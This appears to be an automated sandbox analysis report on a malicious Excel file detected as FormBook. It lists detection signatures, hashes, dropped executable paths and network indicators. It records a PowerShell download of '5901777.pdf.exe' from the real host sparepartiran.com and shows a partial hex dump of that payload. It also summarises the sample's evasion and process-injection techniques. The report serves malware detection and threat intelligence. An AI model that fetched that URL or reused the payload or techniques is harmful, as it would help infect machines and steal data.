Analysis Report 5901777.xls

Overview

General Information

Sample Name: 5901777.xls
Analysis ID: 323692
MD5: 899e5af08f0794f0131adbf03f841045
SHA1: 242508434986d472b0b83387ec8d5d33888baa29
SHA256: 74b115a8b1f4e18d26b092dc965b60ad94dba931591d9913db219823d294904a
Tags: xls

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected FormBook
Bypasses PowerShell execution policy
Creates processes via WMI
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Powershell drops PE file
Queues an APC in another process (thread injection)
Sigma detected: Executables Started in Suspicious Folder
Sigma detected: Execution in Non-Executable Folder
Sigma detected: Suspicious Program Location Process Starts
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\Public\oftmhayq.exe Avira: detection malicious, Label: HEUR/AGEN.1136389
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Avira: detection malicious, Label: HEUR/AGEN.1136389
Multi AV Scanner detection for domain / URL
Source: sparepartiran.com Virustotal: Detection: 10% Perma Link
Source: http://sparepartiran.com Virustotal: Detection: 10% Perma Link
Multi AV Scanner detection for submitted file
Source: 5901777.xls Virustotal: Detection: 23% Perma Link
Yara detected FormBook
Source: Yara match File source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\Public\oftmhayq.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 30.2.oftmhayq.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 29.2.oftmhayq.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\

Software Vulnerabilities:

barindex
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: sparepartiran.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49743 -> 162.223.88.131:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49743 -> 162.223.88.131:80

Networking:

barindex
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Nov 2020 10:38:08 GMTServer: ApacheLast-Modified: Fri, 27 Nov 2020 09:07:10 GMTAccept-Ranges: bytesContent-Length: 552960Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 27 Nov 2020 10:38:08 GMTServer: ApacheLast-Modified: Fri, 27 Nov 2020 09:07:10 GMTAccept-Ranges: bytesContent-Length: 552960Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0b be c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 50 04 00 00 1e 04 00 00 00 00 00 4e 6f 04 00 00 20 00 00 00 80 04 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 6e 04 00 57 00 00 00 00 80 04 00 d8 1b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 4f 04 00 00 20 00 00 00 50 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d8 1b 04 00 00 80 04 00 00 1c 04 00 00 52 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 08 00 00 02 00 00 00 6e 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 6f 04 00 00 00 00 00 48 00 00 00 02 00 05 00 8c 4a 04 00 68 24 00 00 03 00 00 00 15 00 00 06 a0 30 00 00 ec 19 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 30 0a 00 11 00 00 00 00 00 00 00 02 16 15 2d 08 26 28 13 00 00 0a 2b 03 26 2b f6 2a 00 00 00 03 30 09 00 33 00 00 00 00 00 00 00 02 28 14 00 00 0a 02 1d 2d 13 26 02 19 2d 15 26 02 15 2d 17 26 02 28 05 00 00 06 2b 15 28 03 00 00 06 2b e7 28 04 00 00 06 2b e5 28 07 00 00 06 2b e3 2a 00 13 30 07 00 8a 00 00 00 01 00 00 11 20 d9 03 00 00 1c 2d 1b 26 73 15 00 00 0a 1a 2d 15 26 73 58 00 00 06 1b 2d 0f 26 06 6f 16 00 00 0a 2b 10 0d 2b e3 0a 2b e9 13 04 2b ee 17 28 17 00 00 0a 06 6f 18 00 00 0a 09 6a 32 f0 02 d0 2b 00 00 01 28 19 00 00 0a 72 01 00 00 70 17 8d 48 00 00 01 0b 07 16 d0 01 00 00 1b 28 19 00 00 0a a2 07 28 1a 00 00 0a 14 17 8d 2a 00 00 01 0c 08 16 11 04 6f 5b 00 00 06 a2 08 6f 1b 00 00 0a 74 2b 00 00 01 7d 01 00 00 04 2a 00 00 03 30 09 00 20 00 00 00 00 00 00 00 02 02 7b 01 00 00 04 72 0b 00 00 70 6f 1c 00 00 0a 1d 2d 04 26 26 2b 07 7d 02 00 00 04 2b 00 2a 13 30 09 00 75 00 00 00 02 00 00 11 02 7b 02 00 00 04 28 1d 00 00 0a 19 2d 0a 26
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.223.88.131 162.223.88.131
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: COLOUPUS COLOUPUS
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /js/2Q/5901777.pdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/2Q/5901777.pdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/2Q/5901777.pdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /js/2Q/5901777.pdf.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: sparepartiran.com
Source: powershell.exe, 00000014.00000002.416291005.000001D20A361000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.443905156.000001F6E4B80000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512239339.0000000008A14000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp String found in binary or memory: http://en.wikip
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.421069642.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000014.00000002.441451154.000001D21A613000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000014.00000002.417757866.000001D20A471000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.425672375.000001F6CC491000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.434703367.000001D20B78E000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.c
Source: powershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.431327100.000001F6CD016000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.com
Source: powershell.exe, 00000015.00000002.433516174.000001F6CD269000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.com/js/2Q/5
Source: powershell.exe, 00000015.00000002.437681363.000001F6CD8C3000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exe
Source: powershell.exe, 00000014.00000002.421247257.000001D20A682000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exe0yRO
Source: powershell.exe, 00000014.00000002.417383854.000001D20A3F4000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.com/js/2Q/5901777.pdf.exeers
Source: powershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmp String found in binary or memory: http://sparepartiran.comx
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html:
Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.com
Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comR
Source: oftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.comegu
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: oftmhayq.exe, 00000018.00000003.428462060.0000000005A6B000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/O
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: oftmhayq.exe, 00000018.00000003.429554152.0000000005A6B000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmlj
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG6
Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.coma77
Source: oftmhayq.exe, 00000019.00000002.471212112.00000000063A9000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comldva
Source: oftmhayq.exe, 00000018.00000003.419516812.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000018.00000003.419609379.0000000005A6D000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: oftmhayq.exe, 00000018.00000003.419447690.0000000005A6D000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.comat
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.423991911.00000000063AB000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: oftmhayq.exe, 00000018.00000003.424365835.0000000005A38000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: oftmhayq.exe, 00000018.00000003.424456304.0000000005A37000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnn-u
Source: oftmhayq.exe, 00000018.00000003.423993163.0000000005A37000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cnp
Source: oftmhayq.exe, 00000019.00000003.431627701.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.431695720.00000000063CD000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/I7s
Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Kurst7D
Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/S7
Source: oftmhayq.exe, 00000019.00000003.426288356.00000000063A5000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: oftmhayq.exe, 00000019.00000003.434710127.00000000063F1000.00000004.00000001.sdmp String found in binary or memory: http://www.monotype.
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.comc
Source: oftmhayq.exe, 00000019.00000003.426739016.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.como
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deX
Source: oftmhayq.exe, 00000019.00000003.428314876.00000000063CD000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deocS
Source: oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
